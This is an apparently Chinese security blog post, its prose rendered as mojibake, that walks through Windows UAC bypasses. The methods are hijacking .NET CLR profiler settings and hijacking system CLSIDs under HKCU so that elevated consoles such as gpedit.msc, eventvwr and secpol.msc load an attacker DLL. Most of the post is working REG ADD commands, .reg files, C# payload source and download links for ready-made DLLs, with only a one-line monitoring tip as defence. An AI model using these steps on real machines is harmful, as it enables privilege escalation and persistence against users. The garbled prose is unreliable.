I"ê><h2 id="0x00-å‰è¨€">0x00 å‰è¨€</h2>
<hr />

<p>åœ¨ä¹‹å‰çš„æ–‡ç« <a href="https://3gstudent.github.io/Use-CLR-to-maintain-persistence">ã€ŠUse CLR to maintain persistenceã€‹</a>ä»‹ç»äº†é€šè¿‡CLRåŠ«æŒ.Netç¨‹åºçš„åé—¨ï¼Œç‰¹ç‚¹æ˜¯æ— éœ€ç®¡ç†å‘˜æƒé™ï¼Œå¹¶èƒ½å¤ŸåŠ«æŒæ‰€æœ‰.Netç¨‹åºã€‚é‚£ä¹ˆï¼Œå¦‚æœåŠ«æŒäº†é«˜æƒé™çš„.Netç¨‹åºï¼Œå°±èƒ½å¤Ÿç»•è¿‡UACï¼Œæ¯”å¦‚gpedit.msc</p>

<p>æœ€è¿‘æˆ‘åœ¨clem@clavoillotteçš„åšå®¢ä¸Šä¹Ÿçœ‹åˆ°äº†ç›¸åŒçš„åˆ©ç”¨æ€è·¯ï¼Œå¹¶ä¸”ï¼Œä»–çš„åšå®¢é‡Œæœ‰æ›´å¤šå€¼å¾—å­¦ä¹ çš„åœ°æ–¹ã€‚äºæ˜¯ï¼Œæˆ‘å¯¹ä»–åšå®¢ä»‹ç»çš„å†…å®¹è¿›è¡Œäº†æ•´ç†ï¼Œç»“åˆè‡ªå·±çš„ç»éªŒï¼Œé€‚å½“ä½œè¡¥å……ï¼Œåˆ†äº«ç»™å¤§å®¶ã€‚</p>

<p>clem@clavoillotteçš„åšå®¢åœ°å€ï¼š</p>

<p>https://offsec.provadys.com/UAC-bypass-dotnet.html</p>

<h2 id="0x01-ç®€ä»‹">0x01 ç®€ä»‹</h2>
<hr />

<p>æœ¬æ–‡å°†è¦ä»‹ç»ä»¥ä¸‹å†…å®¹ï¼š</p>

<ul>
  <li>ä½¿ç”¨CLRç»•è¿‡UACçš„æ–¹æ³•</li>
  <li>åŠ«æŒç³»ç»ŸCLSIDç»•è¿‡UACçš„æ–¹æ³•</li>
</ul>

<h2 id="0x02-ä½¿ç”¨clrç»•è¿‡uac">0x02 ä½¿ç”¨CLRç»•è¿‡UAC</h2>
<hr />

<p>æˆ‘åœ¨<a href="https://3gstudent.github.io/Use-CLR-to-maintain-persistence">ã€ŠUse CLR to maintain persistenceã€‹</a>ä¸€æ–‡ä¸­ä½¿ç”¨äº†wmicä¿®æ”¹ç¯å¢ƒå˜é‡ï¼Œä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
</code></pre></div></div>

<p>åœ¨<a href="https://3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence">ã€ŠUse Logon Scripts to maintain persistenceã€‹</a>è¡¥å……äº†ä½¿ç”¨powershellä¿®æ”¹ç¯å¢ƒå˜é‡çš„æ–¹æ³•ï¼Œä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>New-ItemProperty "HKCU:\Environment\" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-Null
New-ItemProperty "HKCU:\Environment\" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Null
</code></pre></div></div>

<p>clem@clavoillotteçš„æ–¹æ³•æ˜¯ç›´æ¥é€šè¿‡reg addï¼Œä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>REG ADD "HKCU\Software\Classes\CLSID\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\InprocServer32" /ve /t REG_EXPAND_SZ /d "C:\Temp\test.dll" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER" /t REG_SZ /d "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" /f
</code></pre></div></div>

<p>clem@clavoillotteçš„POC:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>REG ADD "HKCU\Software\Classes\CLSID\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\InprocServer32" /ve /t REG_EXPAND_SZ /d "C:\Temp\test.dll" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER" /t REG_SZ /d "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" /f
REG ADD "HKCU\Environment" /v "COR_ENABLE_PROFILING" /t REG_SZ /d "1" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER_PATH" /t REG_SZ /d "C:\Temp\test.dll" /f
mmc gpedit.msc
</code></pre></div></div>

<p>ä¸ªäººè®¤ä¸ºä¸éœ€è¦æŒ‡å®šç¯å¢ƒå˜é‡COR_PROFILER_PATHï¼Œç»è¿‡ç²¾ç®€åçš„POCå¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>REG ADD "HKCU\Software\Classes\CLSID\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\InprocServer32" /ve /t REG_EXPAND_SZ /d "C:\test\calc.dll" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER" /t REG_SZ /d "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" /f
REG ADD "HKCU\Environment" /v "COR_ENABLE_PROFILING" /t REG_SZ /d "1" /f
mmc gpedit.msc
</code></pre></div></div>

<p>æµ‹è¯•dllä¾æ—§æ˜¯é€šè¿‡c++ç¼–å†™çš„dllæ ‡å‡†æ¨¡æ¿ï¼Œä¸‹è½½åœ°å€ï¼š</p>

<p>https://raw.githubusercontent.com/3gstudent/test/master/calc.dll</p>

<p>ä¼šæ­£å¸¸å¯åŠ¨gpedit.mscï¼ŒåŒæ—¶å¼¹å‡ºè®¡ç®—å™¨ï¼Œæƒé™ä¸ºhigh</p>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-19/3-1.png" alt="Alt text" /></p>

<p>å¦‚æœæƒ³åªå¯åŠ¨è®¡ç®—å™¨ï¼Œä¸æ‰§è¡Œgpedit.mscï¼Œåœ¨å¯åŠ¨ä»£ç <code class="language-plaintext highlighter-rouge">WinExec("calc.exe",SW_SHOWNORMAL);</code>åæ·»åŠ <code class="language-plaintext highlighter-rouge">ExitProcess(0);</code>å°±å¥½</p>

<p>ç¼–è¯‘å¥½çš„dllå·²ä¸Šä¼ ï¼Œä¸‹è½½åœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://raw.githubusercontent.com/3gstudent/test/master/calcexit.dll</p>

<p>æµ‹è¯•å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-19/3-2.png" alt="Alt text" /></p>

<p>è®¡ç®—å™¨æƒé™ä¸ºhighï¼ŒæˆåŠŸç»•è¿‡UAC</p>

<h2 id="0x03-åŠ«æŒç³»ç»Ÿclsidç»•è¿‡uacçš„æ–¹æ³•">0x03 åŠ«æŒç³»ç»ŸCLSIDç»•è¿‡UACçš„æ–¹æ³•</h2>
<hr />

<p>clem@clavoillotteåœ¨åšå®¢ä¸­åˆ†äº«äº†å¦‚ä½•åŠ«æŒç³»ç»ŸCLSIDå®ç°UACç»•è¿‡ï¼Œæ‰€ä»¥æ¥ä¸‹æ¥å¯¹å…¶é€ä¸ªæµ‹è¯•ï¼Œå¹¶æ ‡è®°éœ€è¦æ³¨æ„çš„åœ°æ–¹</p>

<h3 id="1b29d466a-857d-35ba-8712-a758861bfea1">1ã€{B29D466A-857D-35BA-8712-A758861BFEA1}</h3>

<p>æ³¨å†Œè¡¨æ–‡ä»¶å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{B29D466A-857D-35BA-8712-A758861BFEA1}]
@="Microsoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{B29D466A-857D-35BA-8712-A758861BFEA1}\Implemented Categories]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{B29D466A-857D-35BA-8712-A758861BFEA1}\Implemented Categories\{62C8FE65-4EBB-45E7-B440-6E39B2CDBF29}]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{B29D466A-857D-35BA-8712-A758861BFEA1}\InprocServer32]
@="C:\\Windows\\System32\\mscoree.dll"
"Assembly"="TestDotNet, Version=0.0.0.0, Culture=neutral"
"Class"="TestDotNet.Class1"
"RuntimeVersion"="v4.0.30319"
"ThreadingModel"="Both"
"CodeBase"="file://C://Temp//test_managed.dll"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{B29D466A-857D-35BA-8712-A758861BFEA1}\InprocServer32\10.0.0.0]
"Assembly"="TestDotNet, Version=0.0.0.0, Culture=neutral"
"Class"="TestDotNet.Class1"
"RuntimeVersion"="v4.0.30319"
"CodeBase"="file://C://Temp//test_managed.dll"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{B29D466A-857D-35BA-8712-A758861BFEA1}\ProgId]
@="Microsoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager"
</code></pre></div></div>

<p><strong>æ³¨ï¼š</strong></p>

<p>æ³¨å†Œè¡¨é¡¹ä¸­çš„<code class="language-plaintext highlighter-rouge">@="Microsoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager"</code>è¡¨æ˜ï¼Œæ‰§è¡Œgpedit.mscæ—¶ä¼šè°ƒç”¨è¯¥CLSID</p>

<p>ç”Ÿæˆtest_managed.dllçš„c#ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System;
using System.Diagnostics;

namespace TestDotNet
{
   public class Class1
   {
      static Class1()
      { 
         Process.Start("calc.exe");
         Environment.Exit(0);
      }
   }
}
</code></pre></div></div>

<p>ä¿å­˜ä¸º<code class="language-plaintext highlighter-rouge">TestDotNet.cs</code>ï¼Œç¼–è¯‘æˆdll</p>

<p>ä½¿ç”¨csc.exeç¼–è¯‘ç”Ÿæˆdllï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library TestDotNet.cs
</code></pre></div></div>

<p><strong>æ³¨ï¼š</strong></p>

<p>ä½¿ç”¨.Net 4.0ç›®å½•ä¸‹çš„csc.exe</p>

<p>å°†ç”Ÿæˆçš„TestDotNet.dllé‡å‘½åä¸ºtest_managed.dllï¼ŒæˆåŠŸç»•è¿‡UACï¼Œæµ‹è¯•å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-19/4-4.png" alt="Alt text" /></p>

<p><strong>è¡¥å……å…³äºc#ç¼–è¯‘æ–‡ä»¶çš„ä¸€ä¸ªæŠ€å·§ï¼š</strong></p>

<p>ä½¿ç”¨Visual Studioç¼–è¯‘c#ç¨‹åºï¼Œå¦‚æœé¡¹ç›®åç§°åŒç¨‹åºé›†åç§°(å³å‘½åç©ºé—´namespace)ä¸å¯¹åº”ï¼ˆç»“åˆæœ¬æ–‡ï¼Œä»£ç ä¸­ç¨‹åºé›†åç§°ä¸ºTestDotNetï¼Œè€Œæ–°å»ºçš„é¡¹ç›®åå´æ˜¯Class1ï¼‰ï¼Œéœ€è¦é‡æ–°æŒ‡å®šç¨‹åºé›†åç§°ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-19/4-2.png" alt="Alt text" /></p>

<p>åŒæ ·ï¼Œä½¿ç”¨csc.exeç¼–è¯‘ç”Ÿæˆæ–‡ä»¶ä¹Ÿå­˜åœ¨è¿™ä¸ªé—®é¢˜</p>

<p>ä¾‹å¦‚å°†æºä»£ç ä¿å­˜ä¸ºa.csï¼Œé‚£ä¹ˆåœ¨è¾“å‡ºçš„æ—¶å€™å¿…é¡»åŠ /outå‚æ•°æŒ‡å®šè¾“å‡ºæ–‡ä»¶ä¸ºTestDotNet.dllï¼Œè¿™æ ·ç¨‹åºé›†åç§°ä¹Ÿé»˜è®¤ä¸ºTestDotNetï¼ˆåŒæºä»£ç å¯¹åº”ï¼‰ï¼Œå…·ä½“å‚æ•°å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library /out:TestDotNet.dll a.cs
</code></pre></div></div>

<p>å¦åˆ™ï¼Œdllè™½ç„¶èƒ½å¤Ÿè¢«åŠ è½½ï¼Œä½†æ— æ³•æ‰§è¡Œï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-19/4-3.png" alt="Alt text" /></p>

<h3 id="2d5ab5662-131d-453d-88c8-9bba87502ade">2ã€{D5AB5662-131D-453D-88C8-9BBA87502ADE}</h3>

<p>æ³¨å†Œè¡¨æ–‡ä»¶å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{D5AB5662-131D-453D-88C8-9BBA87502ADE}]
@="Microsoft.ManagementConsole.Advanced.FrameworkSnapInFactory"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\Implemented Categories]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\Implemented Categories\{62C8FE65-4EBB-45e7-B440-6E39B2CDBF29}]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\InprocServer32]
@="C:\\Windows\\System32\\mscoree.dll"
"Assembly"="TestDotNet, Version=0.0.0.0, Culture=neutral"
"Class"="TestDotNet.Class1"
"RuntimeVersion"="v2.0.50727"
"ThreadingModel"="Both"
"CodeBase"="file://C://Temp//test_managed.dll"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\InprocServer32\3.0.0.0]
"Assembly"="TestDotNet, Version=0.0.0.0, Culture=neutral"
"Class"="TestDotNet.Class1"
"RuntimeVersion"="v2.0.50727"
"CodeBase"="file://C://Temp//test_managed.dll"
</code></pre></div></div>

<p><strong>æ³¨ï¼š</strong></p>

<p>æ³¨å†Œè¡¨é¡¹ä¸­çš„<code class="language-plaintext highlighter-rouge">@="Microsoft.ManagementConsole.Advanced.FrameworkSnapInFactory"</code>ï¼Œä»¥ä¸‹å‘½ä»¤æ‰§è¡Œæ—¶ä¼šè°ƒç”¨è¯¥CLSIDï¼š</p>

<ul>
  <li>compmgmt.msc</li>
  <li>eventvwr.msc</li>
  <li>secpol.msc</li>
  <li>taskschd.msc</li>
</ul>

<p>ä½¿ç”¨csc.exeç¼–è¯‘dllï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /t:library TestDotNet.cs
</code></pre></div></div>

<p><strong>æ³¨ï¼š</strong></p>

<p>dllè¦ä½¿ç”¨.net 2.0ç¼–è¯‘</p>

<h3 id="30a29ff9e-7f9c-4437-8b11-f424491e3931">3ã€{0A29FF9E-7F9C-4437-8B11-F424491E3931}</h3>

<p>æ³¨å†Œè¡¨æ–‡ä»¶å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}]
@="NDP SymBinder"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32]
@="C:\\Windows\\System32\\mscoree.dll"
"ThreadingModel"="Both"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32\4.0.30319]
@="4.0.30319"
"ImplementedInThisVersion"=""

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\ProgID]
@="CorSymBinder_SxS"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server]
@="C:\\Temp\\test_unmanaged.dll"
</code></pre></div></div>

<p>æµ‹è¯•ç³»ç»Ÿä¸ºWin7å’ŒWin10ï¼ŒæœªæˆåŠŸï¼Œæ‰€ä»¥æˆ‘å¯¹è¯¥è„šæœ¬ä½œäº†ä¿®æ”¹ï¼Œä¿®æ”¹åçš„æ–‡ä»¶å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}]
@="NDP SymBinder"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32]
@="C:\\Temp\\test_unmanaged.dll"
"ThreadingModel"="Both"
</code></pre></div></div>

<p>æ­¤å¤„çš„test_unmanaged.dllåŒ1å’Œ2çš„ä¸åŒï¼Œè¿™é‡Œéœ€è¦ä¸€ä¸ªæ ‡å‡†dllï¼Œå®ç°dllåŠ«æŒï¼Œdllä¸‹è½½åœ°å€;</p>

<p>https://raw.githubusercontent.com/3gstudent/test/master/calcexit.dll</p>

<p>æ‰§è¡Œä»¥ä¸‹ä»£ç å‡èƒ½è§¦å‘dllåŠ«æŒï¼Œå®ç°UACç»•è¿‡ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Windows\System32\eventvwr.exe
</code></pre></div></div>

<p>or</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Windows\System32\mmc.exe CompMgmt.msc
</code></pre></div></div>

<p><strong>æ³¨ï¼š</strong></p>

<p>è¯¥åˆ©ç”¨æ–¹æ³•b33f@FuzzySecurityåœ¨DefCon25ä¹Ÿä»‹ç»è¿‡ï¼Œè¯¦æƒ…å¯è§å¦‚ä¸‹é“¾æ¥ï¼š</p>

<p>https://raw.githubusercontent.com/FuzzySecurity/DefCon25/master/Lab-Writeup.txt</p>

<h3 id="4cb2f6723-ab3a-11d2-9c40-00c04fa30a3e">4ã€{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}</h3>

<p>æ³¨å†Œè¡¨æ–‡ä»¶å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}]
@="Microsoft Common Language Runtime Meta Data"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\InprocServer32]
@="C:\\Windows\\System32\\mscoree.dll"
"ThreadingModel"="Both"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\InprocServer32\4.0.30319]
@="4.0.30319"
"ImplementedInThisVersion"=""

[HKEY_CURRENT_USER\Software\Classes\CLSID\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\ProgID]
@="CLRMetaData.CorRuntimeHost.2"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\Server]
@="..\\..\\..\\..\\Temp\\test_unmanaged.dll"
</code></pre></div></div>

<p>æ­¤å¤„çš„test_unmanaged.dllåŒ1å’Œ2çš„ä¸åŒï¼Œè¿™é‡Œéœ€è¦ä¸€ä¸ªæ ‡å‡†dllï¼Œå®ç°dllåŠ«æŒï¼Œdllä¸‹è½½åœ°å€;</p>

<p>https://raw.githubusercontent.com/3gstudent/test/master/calcexit.dll</p>

<p>æ‰§è¡Œsecpol.mscè§¦å‘dllåŠ«æŒï¼Œæµ‹è¯•å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-19/5-2.png" alt="Alt text" /></p>

<h2 id="0x04-è¡¥å……">0x04 è¡¥å……</h2>

<p>ä½¿ç”¨Procmonè®°å½•gpedit.mscçš„å¯åŠ¨è¿‡ç¨‹ï¼Œå¯»æ‰¾å¯è¢«åˆ©ç”¨çš„ç³»ç»ŸCLSIDï¼Œå¯»æ‰¾ç‰¹å¾å¦‚ä¸‹ï¼š</p>

<p>æ‰“å¼€æ³¨å†Œè¡¨é”®å€¼<code class="language-plaintext highlighter-rouge">HKCU:\Software\Classes\CLSID\{****}\InprocServer32</code>ï¼Œè¿”å›<code class="language-plaintext highlighter-rouge">NAME NOT FOUND</code></p>

<p>æ‰“å¼€æ³¨å†Œè¡¨é”®å€¼<code class="language-plaintext highlighter-rouge">HKCR:\CLSID\{****}\InprocServer32</code>ï¼Œè¿”å›<code class="language-plaintext highlighter-rouge">SUCCESS</code></p>

<p>å¦‚ä¸‹å›¾ï¼Œæ ‡è®°çš„å‡ ä¸ªCLSIDç¬¦åˆè¦æ±‚</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-19/4-1.png" alt="Alt text" /></p>

<p>åœ¨æµ‹è¯•ç³»ç»ŸWin7 x86ä¸‹å…±æ‰¾åˆ°å¦‚ä¸‹ç¬¦åˆè¦æ±‚çš„CLSIDï¼š</p>

<ul>
  <li>{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}</li>
  <li>{B708457E-DB61-4C55-A92F-0D4B5E9B1224}</li>
  <li>{871C5380-42A0-1069-A2EA-08002B30309D}</li>
  <li>{D02B1F72-3407-48ae-BA88-E8213C6761F1}</li>
  <li>{B29D466A-857D-35BA-8712-A758861BFEA1}</li>
  <li>{D02B1F73-3407-48AE-BA88-E8213C6761F1}</li>
  <li>{B0395DA5-6A15-4E44-9F36-9A9DC7A2F341}</li>
  <li>{ADE6444B-C91F-4E37-92A4-5BB430A33340}</li>
</ul>

<h2 id="0x05-é˜²å¾¡">0x05 é˜²å¾¡</h2>
<hr />

<p>ç›‘æ§æ³¨å†Œè¡¨<code class="language-plaintext highlighter-rouge">HKEY_CURRENT_USER\Software\Classes\CLSID\</code>ä¸‹é”®å€¼çš„åˆ›å»ºå’Œä¿®æ”¹</p>

<h2 id="0x06-å°ç»“">0x06 å°ç»“</h2>
<hr />

<p>å¾®è½¯ä¸æŠŠUACç»•è¿‡ä½œä¸ºæ¼æ´ï¼Œç«™åœ¨ä»–ä»¬çš„è§’åº¦å¯ä»¥ç†è§£ã€‚ä½†åœ¨æ¸—é€æµ‹è¯•ä¸­ï¼Œå¸¸å¸¸ä¼šç¢°åˆ°éœ€è¦ç»•è¿‡UACçš„æƒ…å†µï¼ŒæŸäº›UACç»•è¿‡æ–¹æ³•å¾€å¾€è¿˜èƒ½ä½œæ›´å¤šåˆ©ç”¨ã€‚ç«™åœ¨é˜²å¾¡çš„è§’åº¦ï¼Œæé†’é˜²å¾¡æ–¹å¯¹UACç»•è¿‡æ–¹æ³•ä¿æŒå…³æ³¨ã€‚</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>

:ET